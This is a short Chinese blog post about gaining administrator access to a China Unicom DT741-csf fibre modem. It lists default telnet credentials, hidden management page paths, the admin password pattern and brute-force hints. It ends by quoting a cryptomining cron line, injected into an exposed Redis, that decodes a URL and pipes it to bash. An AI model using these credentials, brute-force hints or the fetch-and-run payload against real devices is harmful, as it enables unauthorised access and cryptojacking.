联通 DT741-csf 光猫管理员账号
最近在整自动追番1,需要用到 BT 下载,Aria2 似乎没有 UPnP ,所以需要手动设置下虚拟主机,端口转发之类的事情。看了下家里的光猫是联通的 DT741-csf
。
在各种搜索和自己研究中,找到了一些破解的方法。
/hidden_version_switch.html
打开 telnet ,使用root:Pon521
登陆之后拿配置文件/getpage.gch?pid=1002&nextpage=*.gch
可以跳转到一些普通用户看不到的界面- 使用默认用户名密码
CUAdmin
上面三种方法都不行,telnet 端口虽然打开了,但密码不对。通过 /getpage.gch
最多跳转到 FTP 设置界面,更多设置估计是在后台有做限制了。
我甚至安装了 Kail Linux 准备穷举 telnet 密码,但由于是单线程,太慢了,就放弃了。
后来就是投诉到当地联通宽带,回电说一般情况是不能给用户管理员密码之类的,还要求我做个保证,如果自己玩坏了,不能找联通修。
题外话:装机师傅和联通客服都不知道什么是管理员密码,他们甚至分不清宽带账户、猫的登录、管理员账户和路由器账户。还被师傅教育不要乱搞,别以为自己很聪明 etc…
最后拿到了密码 CUAdmin<随机数字x8>
(同 telnet 密码),用户名是 CUAdmin
,登陆位置 ip/cu.html
,
倒是能给以后的穷举提供思路。我在穷举 telnet 密码时用的是 CUAdmin
,cuadmin
,admin
作为前缀加数字 0 一直到 10000000。但现在已知组合情况,可以少很多次尝试,虽然还是有 10^8
可能性….. 但至少是在范围内了。
虽然体验不是很好,但是联通给公网 IP 还是很大方的,1 分钟的电话就要到了。
不小心把 Redis 也暴露在公网上了(没有密码),瞬间被塞挖矿/加密之类的脚本的内容到 Redis 里..
*/3 * * * * * <url-b64>|base64 -d|bash|bash